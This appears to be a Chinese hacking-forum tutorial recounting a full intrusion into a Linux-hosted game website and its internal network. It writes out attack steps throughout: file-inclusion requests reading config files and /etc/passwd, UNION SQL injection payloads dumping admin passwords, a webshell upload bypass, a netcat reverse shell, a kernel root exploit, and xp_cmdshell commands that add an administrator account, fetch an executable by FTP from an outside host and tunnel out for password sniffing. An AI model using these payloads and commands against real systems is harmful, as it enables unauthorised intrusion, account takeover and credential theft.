|
作者:randy
来源:火狐技术联盟
目标:JP
类型:某官Game
服务器linux
网络环境:20.*.*.*内网组成.路由映射端口.
本文只是给思路.难免有错大家谅解希望大家能耐心看完.本人只是鸟一只.
=============国界===============
好了废话少说开始.站的URL我就拿www.test.com代替.本来想让大家都体会一下.可惜狐狸窝不能发真实地址.
拿到了站大概看了一下.PHPLINUXAPACHEMYSQL组成.貌似还有一处用了一个让我无法决定的数据库.首先我们从
整个站的结构开始了解.拿出WWWSCAN由于我经常检测国外的站我收集了很多敏感的目录文件等等当然软件作者
也收集了许多有用的.结果返回大概目录有
/admin/
/config/
/news/
/news/newadmin/
/news/newadmin/test.php
/admin/test.php/info.php
省略..
有用的就这些.因为我最想要的就是后台.至少有了管理员的USER&pASS有了能用的地方.
admin目录访问提示403newadmin出来一个登录页.丫的开心.请出GOOGLE.
site:test.cominurl:php
site:test.comadmin
site:test.comlogin
site:test.comfiletype:php|asp|jsp|aspx|jsp|由于是想看看其他子站有没有WIN系统.这样好插手.结果只有PHP而且子站大多都是有HTML组成的
搜到这些大概得到了些信息.大概看到了网站组成脚本的名称心里感觉可疑的可以注的点.还有一些比较少见的页面.大家SEACH下会有这样的感觉的
打开工具箱.有个FUCKGOOGLE.exe可以搜集所有GOOGLE搜到的URL做成一个HTML给你.然后很多链接.大家可以在AD注入工具里打开这个页面让AD扫.
就算AD不是注MYSQL的.至少也分的清楚AND1=1和AND1=2的区别.在AD放了10分钟后看了下结果.没啥好玩的...放弃GOOGLE.{注:这其中大家一定得耐心的观察}
好了没戏了.既然ADMIN目录403就从他那开始下手.随便猜了几个登录页面.RP问题没出来.在WWWSCAN跑了一下啥都木有..汗.放弃...
新闻系统啊新闻系统..你咋就是个新闻系统咧.后台至少可以让我用溯雪跑一下.就算不科学也碰碰运气...跑完了没戏{注:当然在这过程中你可以做其他的)
有了后台我怕就是认证的问题.到处找点.一直都没找到.有个VOTE.进去看了一下...谁谁谁%xx.GET了'出错了.PHP送给我路径.and1=2返回结果正常.和1=1没啥区别.汗.再来
/**/and/**/1=2还是一样大家当我在放屁吧.放弃继续找....找啊找..突然看到了个这么个URLread4.php?files=include/hellokitty.html这么个连接.去掉hellokitty.htmlPHP提示
Warning:Smartyerror:unabletoreadresource:"include"inin/home/httpd/html/libs/test.phponline1095
嘿嘿爽了.接着我随便找了一个他们站的图片提交read4.php?files=../img/bar_logo.jpg嘎嘎.返回的结果是?�JFIF��dd�Ducky��<�Adobed�省略....
好继续.提交read4.php?files=../read4.php返回
<?
require'../libs/xxxx******(假的).php';
include'sqlfunc_csm2.inc';
session_start();
.....省略
有进展继续.提交read4.php?files=../sqlfunc_csm2.inc
拿到的当然是MYSQLUSER&pASS啦.前提不是ROOT.
好了.虽然没找到点至少找到了一个另类的load_file.不管3721继续攻击!!!
read4.php?files=../../../../../etc/passwd
当然出来咯.找了几个有/BIN/BASH的用户用MYSQL的密码去尝试SSH结果失败.
不急.再来.我们必须得找到点.花了一个小时的功夫....
还是没找到点.无奈之下用MAXTHON查看源代码.就是表单啦.搜索php啊.无意中搜到一个很奇怪的页面我在GOOGLE中也没见过好像是调用的吧.无聊
具体是../dj?msb=908好家伙打开它...返回让我一滴汗落下来...就出来个3456.最后我才发现这个页面为了统计用户访问的次数.
加了个'出错了.1=21=1.^_^功夫不负有心人.我注我注我注.我直接注死.
and1=2/**/union/**/select/**/1,2
好了返回正常...
and1=2/**/union/**/select/**/1,user()
返回刚才我暴出来的MYSQL.有些朋友就问了.你都拿到MYSQL密码了.你怎么还不去连人家数据INTOFILE呢?大哥我希望您看清楚.上面我说的结果20.*.*.*影射..多的废话我不想说.
and1=2/**/union/**/select/**/1,database()
没错喔.出来的和暴出来的库一样.看你丫的我咋玩你.万事齐全.就是管理员帐号和密码了.
问题来了.表名....这个简单啦.用刚才暴文件的方法去暴login.php或它所POST的文件就可以找到表明了.大家懂我意思吧.继续注
and1=2/**/union/**/select/**/news_admin,news_password/**/from/**/administrator55991(BT吧管理员很有意识)
暴出来了.密码是BASE64大家可以到来解开.或者用CAIN的附加功能.或者一会我给大家发个编码工具非常好用.
好了.拿到帐号密码了.进入后台.编辑新闻和发布新闻.其他的说了浪费时间.当然有上传功能啦.乐呵呵的上传个php....
.....
神啊救救我吧.我都够麻烦了..
必须上传JPG或GIF.我砸电脑的念头都有了...
稳定稳定..继续...先找了一个真正的图片.后缀改成.fuck上传!!提示成功.看了下上传的后辍.没错.是.fuck.
娘地.原来破东西只检测GIF头.再来.在C99头上加个GIF头GIF89a上传!!!!
失败!!!!!!!!!!!!!!!!!!!!!
稳定下..传了个加GIF头的JSP和CGI.上传成功不过人家服务器不解析.
一根烟出去呼吸一下新鲜空气.突然抽烟的时候灵光一闪...对了!!!
上传后缀为.pHP带GIF头的马儿...哇塞!!!!成功咧.爽.{注意大家看清楚.PHPPhppHp等等的组合方式具体原理我就不解释了.各位牛都都知道.速破黑(SUPERHEI)的文章有写
输入密码进入WEBSHELL...既然进来了.我们就搞个顶翻天.
这感觉真好啊.555555.进来以后上传个NSTVIEW.php进入TOOLS选项.有个BACKDOOR.本机执行nc-vvlp520
点下Start回来了个SHELL.好开始提权.拿到肉特....
提交id
nobody.
提交uname-a
废话不然APACHE白做APACHE啊白痴!!!-.-
linux2.4.20xxxxxxx
其实这中间也很巧合.可能运气好吧.我用brk.c成功提到肉特...
brk.c大家可以去www.milw0rm.comseach下...
开始提权...
$gccbrk.c-obrk
$./brk
.....省略....
#sh.x.x
好了.继续.
nmap-v-sS20.1.0.1/16
返回一大堆.有一台WIN机器.大概是2K.LINUX使上不舒服.先搞定他吧.
开了139445143333895900
#netstat-an
发现这台机器还连接着那台2K的1433狂喜...
记得前面的ADMIN目录吗?403那个...我大概看了下那个目录的文件仔细观察看.includesql.php紧张的打开sql.php哇/se/se/se运气实在好的不行了..
是SA喔.但是问题又来了...APACHE+LINUX不支持MSSQL啊.我又是菜鸟一只.又不会写PHP...GOOGLE了下搜到了好东西
freetds.LINUX管理MSSQL的工具.赶快下载下来安装
#wget
#tar-zxvffreetds.tar.gz
#cdfreetd./configure--prefix=/usr/local/freetds--with-tdsver=7.0
#gmake(生成Makefile,我试验过,make也可以)
#gmakeinstall(安装)
OK了.继续
#cdbin
#./tsql-h20.1.0.9-p1433-Usa-PXXXX98#4登录成功后会出现>
>execmaster.dbo.xp_cmdshellnetuserRandyxxxxx/add
>execmaster.dbo.xp_cmdshellnetlocalgroupadministratorsRandy/add
>execmaster.dbo.xp_cmdshellftp12.12.12.12|"Randy"|"121212"|"getdown.exe"|"bye"|我就省略的写了...具体是那个FTP的BAT.大家都知道吧.
>execmaster.dbo.xp_cmdshelldown.exeVIDC大家都会配置吧.
>execmaster.dbo.xp_cmdshelldown.exe
>execmaster.dbo.xp_cmdshellvidc.exe(执行之前本地执行vidc.exe-p7777
>exit
好了.VIDC的端口也映射过来了.链接本地的127.0.0.1:7777进到终端.安装CAIN开始SNIFF.
那服务器也没人管.1天半后.嗅到了SSH的密码.ROOT$*2323****
全段都是相同帐号密码.就这一台WIN.就这样网关帐号密码.SSH等等更别提数据库了.全让我干了顶朝天...
具体文章里用到的工具大家可以找我要hellrandy@Homtail.comQQ:686641Randy
文章难免有错...可能思路比较幼稚...或者别的.反正我人也小.大家凑合着看吧.转载请注明版权.
|
当前位置:
